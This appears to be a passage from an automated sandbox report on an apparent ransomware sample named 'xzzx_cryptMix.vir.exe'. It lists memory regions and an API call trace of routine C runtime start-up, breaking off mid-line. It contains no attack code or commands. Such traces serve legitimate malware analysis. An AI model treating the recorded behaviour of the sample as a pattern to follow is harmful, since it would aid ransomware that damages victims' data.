entry_point = 0x0 region_type = private name = "private_0x000000007ef77000" filename = "" Region: id = 1842 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1843 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 1844 start_va = 0x4080000 end_va = 0x40bffff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1845 start_va = 0x4cd0000 end_va = 0x4dcffff entry_point = 0x0 region_type = private name = "private_0x0000000004cd0000" filename = "" Region: id = 1846 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 1847 start_va = 0x3e70000 end_va = 0x3e70fff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 1848 start_va = 0x3e80000 end_va = 0x3e80fff entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Region: id = 1849 start_va = 0x3e90000 end_va = 0x3ecffff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 1850 start_va = 0x40c0000 end_va = 0x41bffff entry_point = 0x0 region_type = private name = "private_0x00000000040c0000" filename = "" Region: id = 1851 start_va = 0x4290000 end_va = 0x4290fff entry_point = 0x0 region_type = private name = "private_0x0000000004290000" filename = "" Region: id = 1852 start_va = 0x7ef7d000 end_va = 0x7ef7ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef7d000" filename = "" Region: id = 1853 start_va = 0x42a0000 end_va = 0x42a0fff entry_point = 0x0 region_type = private name = "private_0x00000000042a0000" filename = "" Region: id = 1854 start_va = 0x42b0000 end_va = 0x42b0fff entry_point = 0x0 region_type = private name = "private_0x00000000042b0000" filename = "" Region: id = 1855 start_va = 0x42c0000 end_va = 0x42c0fff entry_point = 0x0 region_type = private name = "private_0x00000000042c0000" filename = "" Region: id = 1856 start_va = 0x46d0000 end_va = 0x46d0fff entry_point = 0x0 region_type = private name = "private_0x00000000046d0000" filename = "" Region: id = 1857 start_va = 0x46e0000 end_va = 0x46e0fff entry_point = 0x0 region_type = private name = "private_0x00000000046e0000" filename = "" Region: id = 1858 start_va = 0x3e50000 end_va = 0x3e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1859 start_va = 0x3e90000 end_va = 0x3e90fff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 1860 start_va = 0x4080000 end_va = 0x417ffff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1861 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 1862 start_va = 0x3ea0000 end_va = 0x3ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ea0000" filename = "" Region: id = 1863 start_va = 0x3e90000 end_va = 0x3e90fff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 1864 start_va = 0x3ea0000 end_va = 0x3ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ea0000" filename = "" Region: id = 1865 start_va = 0x3e90000 end_va = 0x3e90fff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 1866 start_va = 0x3ea0000 end_va = 0x3ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ea0000" filename = "" Region: id = 1867 start_va = 0x3eb0000 end_va = 0x3eeffff entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 1868 start_va = 0x41d0000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1869 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 1870 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1871 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 1872 start_va = 0x3e70000 end_va = 0x3eaffff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 1873 start_va = 0x4080000 end_va = 0x417ffff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1874 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 1875 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1876 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 1877 start_va = 0x3e50000 end_va = 0x3e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1878 start_va = 0x3e90000 end_va = 0x3e90fff entry_point = 0x0 region_type = private name = "private_0x0000000003e90000" filename = "" Region: id = 1879 start_va = 0x3ea0000 end_va = 0x3ea0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ea0000" filename = "" Region: id = 1880 start_va = 0x3eb0000 end_va = 0x3eeffff entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 1881 start_va = 0x41d0000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1882 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 1883 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1884 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 1885 start_va = 0x3e70000 end_va = 0x3eaffff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 1886 start_va = 0x3ef0000 end_va = 0x3ef0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 1887 start_va = 0x4080000 end_va = 0x417ffff entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1888 start_va = 0x7ef89000 end_va = 0x7ef8bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef89000" filename = "" Region: id = 1889 start_va = 0x3f00000 end_va = 0x3f00fff entry_point = 0x0 region_type = private name = "private_0x0000000003f00000" filename = "" Region: id = 1890 start_va = 0x3f50000 end_va = 0x3f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000003f50000" filename = "" Region: id = 1891 start_va = 0x45d0000 end_va = 0x46cffff entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 1892 start_va = 0x7ef80000 end_va = 0x7ef82fff entry_point = 0x0 region_type = private name = "private_0x000000007ef80000" filename = "" Region: id = 1893 start_va = 0x3e50000 end_va = 0x3e50fff entry_point = 0x0 region_type = private name = "private_0x0000000003e50000" filename = "" Region: id = 1894 start_va = 0x3e60000 end_va = 0x3e60fff entry_point = 0x0 region_type = private name = "private_0x0000000003e60000" filename = "" Region: id = 1895 start_va = 0x3eb0000 end_va = 0x3eeffff entry_point = 0x0 region_type = private name = "private_0x0000000003eb0000" filename = "" Region: id = 1896 start_va = 0x41d0000 end_va = 0x42cffff entry_point = 0x0 region_type = private name = "private_0x00000000041d0000" filename = "" Region: id = 1897 start_va = 0x7ef86000 end_va = 0x7ef88fff entry_point = 0x0 region_type = private name = "private_0x000000007ef86000" filename = "" Region: id = 1898 start_va = 0x3e70000 end_va = 0x3e70fff entry_point = 0x0 region_type = private name = "private_0x0000000003e70000" filename = "" Region: id = 1899 start_va = 0x3e80000 end_va = 0x3e80fff entry_point = 0x0 region_type = private name = "private_0x0000000003e80000" filename = "" Thread: id = 1 os_tid = 0x9c8 [0016.703] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x11ab0ea0, dwHighDateTime=0x1d35d7b)) [0016.703] GetCurrentProcessId () returned 0x9c4 [0016.703] GetCurrentThreadId () returned 0x9c8 [0016.703] GetTickCount () returned 0x135ee [0016.703] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=308230430) returned 1 [0016.703] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x55834233)) [0016.703] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0016.707] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0016.707] GetProcAddress (hModule=0x76a20000, lpProcName="FlsAlloc") returned 0x76a34f2b [0016.708] GetProcAddress (hModule=0x76a20000, lpProcName="FlsGetValue") returned 0x76a31252 [0016.708] GetProcAddress (hModule=0x76a20000, lpProcName="FlsSetValue") returned 0x76a34208 [0016.708] GetProcAddress (hModule=0x76a20000, lpProcName="FlsFree") returned 0x76a3359f [0016.709] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0016.709] GetCurrentThreadId () returned 0x9c8 [0016.709] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x5582f736, hStdOutput=0x5582fa6f, hStdError=0x24d07d0)) [0016.709] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0016.709] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0016.709] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0016.709] SetHandleCount (uNumber=0x20) returned 0x20 [0016.709] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe\" " [0016.709] GetEnvironmentStringsW () returned 0x30cc48* [0016.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0016.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x24d11f8, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0016.710] FreeEnvironmentStringsW (penv=0x30cc48) returned 1 [0016.710] GetLastError () returned 0x65b [0016.710] SetLastError (dwErrCode=0x65b) [0016.710] GetLastError () returned 0x65b [0016.710] SetLastError (dwErrCode=0x65b) [0016.710] GetLastError () returned 0x65b [0016.710] SetLastError (dwErrCode=0x65b) [0016.710] GetACP () returned 0x4e4 [0016.710] GetLastError () returned 0x65b [0016.710] SetLastError (dwErrCode=0x65b) [0016.710] IsValidCodePage (CodePage=0x4e4) returned 1 [0016.710] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0016.710] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0016.710] GetLastError () returned 0x65b [0016.710] SetLastError (dwErrCode=0x65b) [0016.710] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0016.710] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0016.710] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0016.710] GetLastError () returned 0x65b [0016.710] SetLastError (dwErrCode=0x65b) [0016.710] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0016.710] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䚮Ƿ䱳喃Ā") returned 256 [0016.710] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䚮Ƿ䱳喃Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0016.710] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䚮Ƿ䱳喃Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0016.710] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÏJ,\x03\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0016.711] GetLastError () returned 0x65b [0016.711] SetLastError (dwErrCode=0x65b) [0016.711] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0016.711] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䚮Ƿ䱳喃Ā") returned 256 [0016.711] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䚮Ƿ䱳喃Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0016.711] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䚮Ƿ䱳喃Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0016.711] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÏJ,\x03\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0016.711] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x55842c78, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js 